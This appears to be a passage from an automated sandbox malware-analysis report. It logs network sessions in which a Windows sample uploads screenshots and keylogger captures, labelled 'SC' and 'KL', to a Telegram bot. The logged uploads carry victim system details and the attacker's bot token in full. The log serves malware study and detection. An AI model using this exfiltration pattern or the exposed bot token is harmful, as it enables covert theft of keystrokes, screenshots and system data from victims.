2025-01-10 15:55:33 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:55:33 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:55:33 UTC	7651	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:55:33 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 65 64 33 61 36 63 32 33 34 37 32 2d 2d 0d 0a Data Ascii: -----------------------------8dd3ed3a6c23472--
2025-01-10 15:55:34 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:55:34 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201780,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524534,"document":{"file_name":"user-642294 2025-01-27 13-08-11.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUNGeBQvalGqCsjx6n2Llo1O8-fbKTAAIqHQACuyoJUPfTGEcQRnoWAQAHbQADNgQ","file_unique_id":"AQADKh0AArsqCVBy","file_size":10562,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUNGeBQvalGqCsjx6n2Llo1O8-fbKTAAIqHQACuyoJUPfTGEcQRnoWAQAHbQADNgQ","file_unique_id":"AQADKh0AArsqCVBy","file_size":10562,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFDRngUL2pRqgrI8ep9i5aNTvPn2ykwACKh0AArsqCVD30xhHEEZ6FjYE","file_unique_id":"AgADKh0AArsqCVA","file_size":57167},"caption":"New SC Recovered!\n\nTime: 01/27/2025 12:58:10\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8 [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49994	149.154.167.220	443	5464	C:\Users\user\Desktop\IUqsn1SBGy.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:55:50 UTC	260	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd499b60c8d6e1 Host: api.telegram.org Content-Length: 933 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:55:51 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:55:51 UTC	933	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 39 39 62 36 30 63 38 64 36 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 39 39 62 36 30 63 38 64 36 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 4b 4c 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 31 30 2f 32 30 32 35 20 30 36 3a 31 33 3a 30 34 0a 55 73 65 72 Data Ascii: -----------------------------8dd499b60c8d6e1Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd499b60c8d6e1Content-Disposition: form-data; name="caption"New KL Recovered!Time: 02/10/2025 06:13:04User
2025-01-10 15:55:51 UTC	1143	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:55:51 GMT Content-Type: application/json Content-Length: 755 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201781,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524551,"document":{"file_name":"user-642294 2025-02-10 06-23-04.html","mime_type":"text/html","file_id":"BQACAgQAAxkDAAEDFDVngUMHUlDXnw2D3i54gfO-5rZqhgACLB0AArsqCVCKNelw5K22ZDYE","file_unique_id":"AgADLB0AArsqCVA","file_size":310},"caption":"New KL Recovered!\n\nTime: 02/10/2025 06:13:04\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address: 8.46.123.189","caption_entities":[{"offset":179,"length":12,"type":"url"}]}}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49995	149.154.167.220	443	5464	C:\Users\user\Desktop\IUqsn1SBGy.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:55:50 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd49a0fe4f34f0 Host: api.telegram.org Content-Length: 57790 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:55:51 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:55:51 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 39 61 30 66 65 34 66 33 34 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 39 61 30 66 65 34 66 33 34 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 31 30 2f 32 30 32 35 20 30 36 3a 35 33 3a 31 35 0a 55 73 65 72 Data Ascii: -----------------------------8dd49a0fe4f34f0Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd49a0fe4f34f0Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/10/2025 06:53:15User
2025-01-10 15:55:51 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:55:51 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:55:51 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:55:51 UTC	7651	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:55:51 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 39 61 30 66 65 34 66 33 34 66 30 2d 2d 0d 0a Data Ascii: -----------------------------8dd49a0fe4f34f0--
2025-01-10 15:55:51 UTC	1516	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:55:51 GMT Content-Type: application/json Content-Length: 1127 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201782,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524551,"document":{"file_name":"user-642294 2025-02-10 07-03-16.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQMUNmeBQwdDf9343e_JdrjT4y3gMotsAAItHQACuyoJUOwfai0s4wAByQEAB20AAzYE","file_unique_id":"AQADLR0AArsqCVBy","file_size":10562,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQMUNmeBQwdDf9343e_JdrjT4y3gMotsAAItHQACuyoJUOwfai0s4wAByQEAB20AAzYE","file_unique_id":"AQADLR0AArsqCVBy","file_size":10562,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAEDFDZngUMHQ3_d-N3vyXa40-Mt4DKLbAACLR0AArsqCVDsH2otLOMAAck2BA","file_unique_id":"AgADLR0AArsqCVA","file_size":57167},"caption":"New SC Recovered!\n\nTime: 02/10/2025 06:53:15\nUser Name: user/642294\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRA [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49996	149.154.167.220	443	7512	C:\Users\user\AppData\Roaming\AppPoint\AppPoint.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 15:55:55 UTC	262	OUT	POST /bot6224217116:AAGNvwYwFGJq74My50AttE7zm5CocLNeufI/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd47ab88a365e6 Host: api.telegram.org Content-Length: 57790 Expect: 100-continue Connection: Keep-Alive
2025-01-10 15:55:55 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-10 15:55:55 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 37 61 62 38 38 61 33 36 35 65 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 37 36 37 33 39 32 30 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 37 61 62 38 38 61 33 36 35 65 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 32 2f 30 37 2f 32 30 32 35 20 31 39 3a 30 33 3a 34 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd47ab88a365e6Content-Disposition: form-data; name="chat_id"1376739206-----------------------------8dd47ab88a365e6Content-Disposition: form-data; name="caption"New SC Recovered!Time: 02/07/2025 19:03:40User
2025-01-10 15:55:55 UTC	16355	OUT	Data Raw: 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c 7c ca 14 Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"\|
2025-01-10 15:55:55 UTC	16355	OUT	Data Raw: 9d 14 0c 4c 52 52 f4 a3 14 00 94 71 4b 49 40 c2 92 9d f8 52 50 02 51 45 1d a9 0c 4a 28 fc 28 a0 04 14 94 ea 4a 43 12 8f ad 2d 25 00 1f 5a 28 a3 f1 a0 67 4b 45 14 56 47 88 14 51 48 cc ab d4 d4 ca 71 82 bc 9d 91 74 e9 4e ac b9 69 a6 df 96 a2 d1 4c f3 57 de 94 48 87 be 3e b5 8c 71 74 24 ec a6 8e c9 e5 98 ca 71 e6 95 27 6f 41 d4 52 d1 5d 07 00 94 51 45 00 14 51 41 20 0c 9e 05 00 b5 0a 2a 0f b5 db 8f f9 69 fa 1a 3e d7 6f ff 00 3d 3f 43 5c ff 00 5a a1 fc eb ef 47 7f f6 66 3b fe 7c cf ff 00 01 7f e4 4f 45 41 f6 bb 7f f9 e9 fa 1a 99 19 5d 43 29 c8 3d eb 48 56 a7 51 da 12 4f d1 98 d6 c1 e2 28 2e 6a d4 e5 15 e6 9a fc c5 a2 8a 2b 53 98 28 a2 8a 00 4a 29 68 a0 61 45 14 52 10 51 45 14 00 94 51 45 03 0a 28 a2 98 05 25 2d 25 00 14 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 Data Ascii: LRRqKI@RPQEJ((JC-%Z(gKEVGQHqtNiLWH>qt$q'oAR]QEQA *i>o=?C\ZGf;\|OEA]C)=HVQO(.j+S(J)haERQEQE(%-%QE(((
2025-01-10 15:55:55 UTC	16355	OUT	Data Raw: 4b 49 40 05 14 51 40 05 14 51 4c 62 51 4b 49 40 05 14 51 40 05 14 51 40 05 25 2d 25 03 0a 28 a2 80 0a 28 a2 80 12 8a 28 a0 02 8a 28 a0 61 49 4b 45 00 25 14 51 40 05 14 51 4c 62 51 4b 45 00 25 14 b4 94 00 94 52 d2 50 01 45 14 53 18 52 52 d1 40 09 45 2d 25 00 14 51 4b 40 09 45 14 50 31 28 a5 a4 a0 02 8a 28 a6 01 45 14 50 31 28 a2 8a 00 28 a2 8a 00 4c 51 4b 45 30 12 8a 5c 51 40 c4 a2 96 8a 04 20 eb 5a 77 3f eb 8f d0 7f 2a cd 1d 6b 4e eb fd 71 fa 0f e5 59 4f e2 40 b7 21 a2 8a 28 34 0a 4a 5a 28 18 52 52 d1 40 09 45 14 50 01 45 14 b4 00 94 94 b4 50 01 45 2d 25 00 32 5f f8 f7 97 fd da ad 67 fe b1 be 95 66 6f f8 f7 97 fd da ad 65 fe b1 be 94 d6 cc 0b 94 b4 51 8a 40 25 14 b8 a3 14 82 e2 62 96 97 14 62 8b 85 c4 c5 14 b8 a3 14 5c 57 13 14 53 b0 7d 29 76 9f 4a 2e 17 Data Ascii: KI@Q@QLbQKI@Q@Q@%-%((((aIKE%Q@QLbQKE%RPESRR@E-%QK@EP1((EP1((LQKE0\Q@ Zw?*kNqYO@!(4JZ(RR@EPEPE-%2_gfoeQ@%bb\WS})vJ.
2025-01-10 15:55:55 UTC	7651	OUT	Data Raw: 54 95 d1 46 1e ce 0a 2f a1 c3 5e a2 ab 51 cd 75 2a 49 71 1d b4 56 b7 32 c9 72 1e 0d 42 49 23 8e 14 04 48 42 21 da cc 48 da 3d f0 7b d3 12 39 be c9 fd 9a 6f a1 13 b5 a9 90 db 05 93 7f da 0f ef 00 ce dd bf 77 0b f7 aa c1 b5 88 cc 65 2b f3 9e f4 c3 63 6c 51 94 c6 30 dd 6b 92 78 49 4a 4e 49 9e 95 3c c6 30 82 83 8d ec 85 b7 8e f0 ea 3a 5d d3 41 38 b7 75 b2 c4 be 59 d8 4e 13 3f 36 31 d6 aa db ce 4c 96 af 66 5e 2b 61 25 ca 83 70 e0 b4 57 25 4e cc b6 00 0a 70 a5 4e 07 39 ce 71 53 2e 99 6a aa 55 54 85 3d a9 4e 9d 6a 40 1e 5f 4a 99 60 e7 2e bd ff 00 12 e3 98 d3 8b 6d 47 7b 7e 0a c4 56 d0 4b 6a da 68 9d 6e ed ee e6 6b 88 8c 57 24 28 66 31 61 58 02 06 32 cc 06 72 7a 75 a4 81 a7 b1 8f 4e b7 bb 0d 6d 74 f2 5c 3c 62 61 b3 61 31 85 8d 9b 3f 74 6f 1c 13 e9 9a 98 69 b6 a3 Data Ascii: TF/^Qu*IqV2rBI#HB!H={9owe+clQ0kxIJNI<0:]A8uYN?61Lf^+a%pW%NpN9qS.jUT=Nj@_J`.mG{~VKjhnkW$(f1aX2rzuNmt\<baa1?toi
2025-01-10 15:55:55 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 34 37 61 62 38 38 61 33 36 35 65 36 2d 2d 0d 0a Data Ascii: -----------------------------8dd47ab88a365e6--
2025-01-10 15:55:56 UTC	1512	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 15:55:56 GMT Content-Type: application/json Content-Length: 1123 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":201783,"from":{"id":6224217116,"is_bot":true,"first_name":"chacha2023","username":"chacha1_bot"},"chat":{"id":1376739206,"first_name":"Chacha","last_name":"1","username":"chacha1000000","type":"private"},"date":1736524556,"document":{"file_name":"user-642294 2025-02-07 